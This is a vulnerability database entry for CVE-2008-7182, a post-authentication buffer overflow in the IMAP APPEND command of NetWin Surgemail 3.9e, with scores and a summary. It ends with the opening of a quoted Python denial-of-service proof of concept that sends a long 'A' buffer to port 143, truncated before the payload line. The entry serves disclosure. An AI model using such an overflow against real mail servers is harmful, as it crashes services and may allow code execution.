CVE-2008-7182

Published: 08/09/2009 Updated: 29/09/2017
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
VMScore: 405
Vector: AV:N/AC:L/Au:S/C:N/I:N/A:P

Vulnerability Summary

Buffer overflow in the IMAP service in NetWin Surgemail 3.9e, and possibly other versions prior to 3.9g2, allows remote authenticated users to cause a denial of service (crash) and possibly execute arbitrary code via a long first argument to the APPEND command, a different vector than CVE-2008-1497 and CVE-2008-1498. NOTE: due to lack of details, it is not certain whether this is the same issue as CVE-2008-2859.

Vulnerable Product

netwin surgemail 3.9e

Exploits

    #!/usr/bin/python
    #
    # Surgemail version 39e-1 - (0day) Post Auth IMAP Buffer overflow DoS
    # Discovered by: Travis Warren
    #
    # The IMAP service contains a buffer overflow in the APPEND command
    #
    #
    import socket

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    buffer = '\x41' * 3000
    s.connect(('192.168.0.103',143))
    s.recv(1024)
    s.send(' ...